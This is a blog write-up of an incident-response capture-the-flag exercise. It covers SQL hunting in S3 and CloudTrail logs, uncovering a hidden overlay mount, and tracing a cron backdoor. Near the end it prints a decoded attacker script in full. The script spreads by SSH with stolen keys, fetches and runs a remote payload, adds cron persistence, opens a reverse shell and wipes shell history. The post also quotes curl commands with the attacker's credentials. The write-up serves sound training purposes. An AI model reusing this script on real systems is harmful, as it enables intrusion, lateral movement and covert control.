cloud_hunting_games

by | Jun 13, 2025 | Cybersecurity | 0 comments

Background

Once a month my department has a “brain day”. This is a day where employees are supposed to step away from normal work and use the time to learn something new, study for an upcoming certification, or finally tackle that long list of technical blog posts that we have been meaning to check out…

In late April, Wiz started teasing about a new CTF challenge they were cooking up. In early May, they finally formally announced it via this blog post: https://www.wiz.io/blog/the-cloud-hunting-games-ctf-challenge. Since this one covers IR and cloud and the last CTF I did from Wiz (https://eksclustergames.com/, will eventually write a blog post about this one) was a blast, I was excited to dive into this one. Before diving into the challenges, you are shown an email from “FizzShadows” noting that they have your company’s data and you most pay them some bitcoin in order for them to not disclose your data.

CTF Name: Cloud Hunting Games

URL: https://www.cloudhuntinggames.com/

Username: volmeringd

# of Challenges: 5

Challenge 1:

The first challenge starts by giving you a small blurb about how your company’s secret recipes are stored in s3 and noting your company has s3 data event logging enabled. It also gives you a text editor of sorts where you can run sql queries. The data you are queryying agasint is the s3 access logs. Note, if sql queries aren’t your jam you can run the default query to get all results, click on the “clomuns” button and at the bottom there is a “Download as CSV” button. It has been a minute since I did sql, so I figured I would use this as a chance to brush off my dust a bit (also leverage my good old friend Copilot).

So based off the description, we are assuming the bad actor obtained files (typically a GetObject event in AWS) and it is a recipe of some sort… So I tried a quick and dirty query like this:

SELECT * FROM s3_data_events WHERE EventName LIKE ‘GetObject’ AND Path LIKE ‘%recipe%’
If you pay attention to the useragents, one of them is not like the other. Most of the useragents are browsers. One is using the boto3 client. Additionally, if you look at the arn, one of them doesn’t seem to follow the same naming pattern as the rest of them. This led me to one iam role: S3Reader/drinks

Challenge 2:

This challenge, they want you to go a step deeper and figure out what IAM user used the S3Reader/drinks assume role. Since we know we want an “AssumeRole” event and the request parameter includes the role you assume into and we want one that includes drinks, we can do this:

SELECT*FROMcloudtrailWHEREEventNameLIKE‘AssumeRole’ANDrequestParametersLIKE‘%drinks%’
We find out that Moe.Jito is the user that assumed into the role.

Challenge 3:

With this challenge, that want to know what machine the user compromised and used for lateral movement. This one took me some time. I went down a number of paths. I first started with seeing what else Moe did… He assumed into another session posing as jack becker. I then looked at Jack’s activity but that didn’t yield much. I then decided to go a more brute force route… I got a unique count of all event names:

SELECT EventName, COUNT(*) AS event_count
FROM cloudtrail
GROUP BY EventName
ORDER BY event_count DESC;

From there, I started going through the event names to see which ones stood out as potential lateral movement. The AssumeRole and UpdateFunctions20150331v2 stood out to me. Looking through the AssumeRole stuff, nothing caught my eye in terms of things to further investigate. The UpdateFunctions20150331v2 was interesting to me because I have read quite a few reports of lambda being a vector for persesitance and/or lateral movement. Looking at that event in particular:

SELECT * FROM cloudtrail WHERE EventName LIKE ‘UpdateFunctionCode20150331v2’

We see that in the “responseElements” column, the lambda being updated is claled “credsrotator”… Sounds like lateral movement if I have ever heard it before.

The machine id is located in the userIdentity_ARN field: arn:aws:sts::509843726190:assumed-role/lambdaWorker/i-0a44002eec2f16c25

Challenge 4:

We now move from sql queries to an actual box. I was elated until I figured out how limited of functionality the box actually had. We are asked to find the IP of the workoad that was the intial entry point into the org. Trying to do normal checks of network based things kept resulting in “XX: command not found”. So then I figured I would look at /var/log… Well var log appears to be empty, except for a hidden file:

root@ssh-fetcher:/var/log# cat .gK8du9
FizzShadows were here…

Checking the current running processes I see a “healthcheck” program running:

root@ssh-fetcher:~# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   4624  3584 ?        SN   16:52   0:00 bash
root           2  0.0  0.0   1148   640 ?        SN   16:52   0:00 /usr/local/bin/healthcheck -log /var/
root         199  0.0  0.0   7060  2944 ?        RN+  16:54   0:00 ps aux

So I figure I would call it and see what happens:

root@ssh-fetcher:~# healthcheck
Usage: healthcheck -log /var/log/yourlogfile.log

For funsies:

root@ssh-fetcher:~# healthcheck -log /var/log/.gK8du9
Failed to open log file: Read-only file system

Well… That doens’t seem ideal. I try to write to home directory:

root@ssh-fetcher:~# healthcheck -log /var/log/.gK8du9
Failed to open log file: Read-only file system

Running the mount command, I can see there are multiple overlay filesystems mounted… One of which is /var/log

root@ssh-fetcher:~# mount | grep overlay | grep /var/log
overlay on /var/log type overlay (rw,relatime,lowerdir=/var/lib/ <snipped>
We can unmount that with:
umount /var/log
While then lets us see the files in /var/log:
root@ssh-fetcher:~# ls -la /var/log/
total 1784
drwxr-xr-x 4 root root 4096 Jun 13 17:06 .
drwxr-xr-x 1 root root 4096 Feb 1 1990 ..
-rw-r–r– 1 root root 94 Jun 13 17:07 .gK8du9
drwxr-xr-x 2 root root 4096 Feb 1 1990 apt
drwxr-x— 2 root root 4096 Feb 1 1990 audit
-rw-r–r– 1 root root 1490798 Feb 1 1990 auth.log
-rw-rw—- 1 root root 0 Feb 1 1990 btmp
-rw-r–r– 1 root root 3232 Feb 1 1990 faillog
-rw-r–r– 1 root root 16009 Jun 13 19:13 health.log
-rw-r–r– 1 root root 292584 Feb 1 1990 lastlog
-rw-rw-r– 1 root root 0 Feb 1 1990 wtmp

The auth file should have details about authentication related activities. Cating that file and grepping for unique IP addresses yields us with a single IP:

root@ssh-fetcher:~# cat /var/log/auth.log | grep -Eo ‘([0-9]{1,3}\.){3}[0-9]{1,3}’ | sort | uniq -c
   5994 102.54.197.238

Challenge 5:

The last challenge, you are tasked with deleting the secret recipe off the attacker’s server. The blurb notes the attacker is “persistent” but this goes right over my head. I poked around the box for awhile but ended up getting stuck. I used 2 points to get a hint and quickly became a sad panda because I realized I didn’t even think to check cron related things… My hint pointed me to cronttabs. Checking for crontab files yields one file:

root@postgresql-service:~# ls -la /var/spool/cron/crontabs/
total 12
drwx-wx–T 1 root root 4096 Feb  1  1990 .
drwxr-xr-x 1 root root 4096 Feb  1  1990 ..
-rw-r–r– 1 root root  168 Feb  1  1990 postgres

Cating that file we are directed to another file /var/lib/postgresql/data/pg_sched:

root@postgresql-service:~# cat /var/spool/cron/crontabs/postgres
# (- installed on Wed Apr  13 08:45:35 2025)
# (Cron version — $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
0 0 * * * bash /var/lib/postgresql/data/pg_sched

Cating that file, we get a lovely giant base64 encoded string. If we base64 decode that string we get the following code:

#!/bin/bash
# List of interesting policies
VULNERABLE_POLICIES=(“AdministratorAccess” “PowerUserAccess” “AmazonS3FullAccess” “IAMFullAccess” “AWSLambdaFullAccess” “AWSLambda_FullAccess”)
SERVER=“34.118.239.100”
PORT=4444
USERNAME=“FizzShadows_1”
PASSWORD=“Gx27pQwz92Rk”
CREDENTIALS_FILE=“/tmp/c”
SCRIPT_PATH=“$(cd “$(dirname “${BASH_SOURCE[0]}”)” &>/dev/null && pwd)/$(basename “${BASH_SOURCE[0]}”)”
# Check if a command exists
check_command() {
    if ! command -v $1 &> /dev/null; then
        install_dependency $1
    fi
}
# Install missing dependencies
install_dependency() {
    local package=$1
    if [[ $package == “curl” ]]; then
        apt-get install curl -y &> /dev/null
                yum install curl -y &> /dev/null
    elif [[ $package == “unzip” ]]; then
        apt-get install unzip -y &> /dev/null
                yum install unzip -y &> /dev/null
    elif [[ $package == “aws” ]]; then
        install_aws_cli
    fi
}
# Install AWS CLI locally
install_aws_cli() {
    mkdir -p $HOME/.aws-cli”
    curl -s “https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip” -o $HOME/.aws-cli/awscliv2.zip”
    unzip -q $HOME/.aws-cli/awscliv2.zip” -d $HOME/.aws-cli/”
    $HOME/.aws-cli/aws/install” –install-dir $HOME/.aws-cli/bin” –bin-dir $HOME/.aws-cli/bin”
    # Add AWS CLI to PATH
    export PATH=$HOME/.aws-cli/bin:$PATH
    echo ‘export PATH=”$HOME/.aws-cli/bin:$PATH”‘ >> $HOME/.bashrc”
}
# Try to spread
spread_ssh() {
    find_and_execute() {
        local KEYS=$(find ~/ /root /home -maxdepth 5 -name ‘id_rsa*’ | grep -vw pub;
                     grep IdentityFile ~/.ssh/config /home/*/.ssh/config /root/.ssh/config 2>/dev/null | awk ‘{print $2}’;
                     find ~/ /root /home -maxdepth 5 -name ‘*.pem’ | sort -u)
        local HOSTS=$(grep HostName ~/.ssh/config /home/*/.ssh/config /root/.ssh/config 2>/dev/null | awk ‘{print $2}’;
                      grep -E “(ssh|scp)” ~/.bash_history /home/*/.bash_history /root/.bash_history 2>/dev/null | grep -oP “([0-9]{1,3}\.){3}[0-9]{1,3}|\b(?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}\b”;
                      grep -oP “([0-9]{1,3}\.){3}[0-9]{1,3}|\b(?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}\b” ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts 2>/dev/null |
                      grep -vw 127.0.0.1 | sort -u)
        local USERS=$(echo “root”;
                      find ~/ /root /home -maxdepth 2 -name ‘.ssh’ | xargs -I {} find {} -name ‘id_rsa’ | awk -F‘/’ ‘{print $3}’ | grep -v “.ssh” | sort -u)
       for key in $KEYS; do
            chmod 400 $key
            for user in $USERS; do
              echo $user
                   for host in $HOSTS; do
                     ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host “(curl -u $USERNAME:$PASSWORD -o /dev/shm/controller http://$SERVER/files/controller && bash /dev/shm/controller)”
                done
            done
        done
    }
    find_and_execute
}
create_persistence() {
(crontab -l 2>/dev/null; echo “0 0 * * * bash $SCRIPT_PATH) | crontab
}
create_shell () {
    echo “Creating a reverse shell”
    /bin/bash -i >& /dev/tcp/”$SERVER“/”$PORT 0>&1
}
# Check role policies
check_role_vuln() {
    local ROLE_NAME=$(aws sts get-caller-identity –query “Arn” –output text | awk -F‘/’ ‘{print $2}’)
    # List attached policies for the given role
    attached_policies=$(aws iam list-attached-role-policies –role-name $ROLE_NAME –query ‘AttachedPolicies[*].PolicyName’ –output text)
    # Check if the user has IAM permissions to list policies
    if [[ $? -eq 0 ]]; then
        # If the user has IAM permissions, check attached policies
        attached_policies_array=($attached_policies)
        for policy in “${attached_policies_array[@]}”; do
            for vuln_policy in “${VULNERABLE_POLICIES[@]}”; do
                if [[ $policy == $vuln_policy ]]; then
                    return 0
                fi
            done
        done
    else
        aws s3 ls
        if [[ $? -eq 0 ]]; then
            return 0
        else
            aws lambda list-functions
            if [[ $? -eq 0 ]]; then
                return 0
            else
                return 1
            fi
        fi
    fi
}
# Check required dependencies
check_command “curl”
check_command “unzip”
check_command “aws”
check_role_vuln
if [[ $? -eq 0 ]]; then
        create_shell
else
        create_persistence
        spread_ssh
        cat /dev/null > ~/.bash_history
fi

Reading through the code, we have credentials and an IP at the top and some type of webserver on the IP with a /files page.

Putting that information togehter:

root@postgresql-service:~# curl -u FizzShadows_1:Gx27pQwz92Rk http://34.118.239.100/files/controller
File download functionality is currently under maintenance. Please try again later.
Lets try one layer higher:
root@postgresql-service:~# curl -u FizzShadows_1:Gx27pQwz92Rk http://34.118.239.100/files          
Size       Date Modified         Name
————————————————–
  4.0KB  Feb 15 16:01  Root Beer.txt
  5.0KB  Feb 15 14:01  Man-in-the-Mojito.txt
  3.5KB  Feb 15 15:01  ExfilCola-Top-Secret.txt
  4.5KB  Feb 15 17:01  Prigat Overflow.txt
 10.0KB  Feb 15 18:01  controller
  2.4MB  Feb 19 14:01  Q3_2023_Financial_Report.pdf
  1.2MB  Mar 01 14:01  2024_budget_planning.xlsx
960.0KB  Feb 16 14:01  employee_directory.xlsx
  1.5MB  Mar 06 14:01  taste_test_results_oct2023.xlsx
  3.5MB  Mar 11 14:01  bottling_line_specs_v2.pdf

Bingo! Now, lets try and delete the “ExfilCola-Top-Secret.txt” file:

root@postgresql-service:~# curl -X DELETE -u FizzShadows_1:Gx27pQwz92Rk http://34.118.239.100/files/ExfilCola-Top-Secret.txt
Success! You’ve deleted the secret recipe before it could be exposed. The flag is: {I know it when I see it}

Wrap Up

This was another wonderful CTF hosted by Wiz. It incorporated elements of cloud as well as host IR tasks. The overlayfs was a new one for me in terms of a mechnism to cover tracks. If you have some time, I would encourage you to try and tackle this CTF yourself!

Related Posts

No Results Found

The page you requested could not be found. Try refining your search, or use the navigation above to locate the post.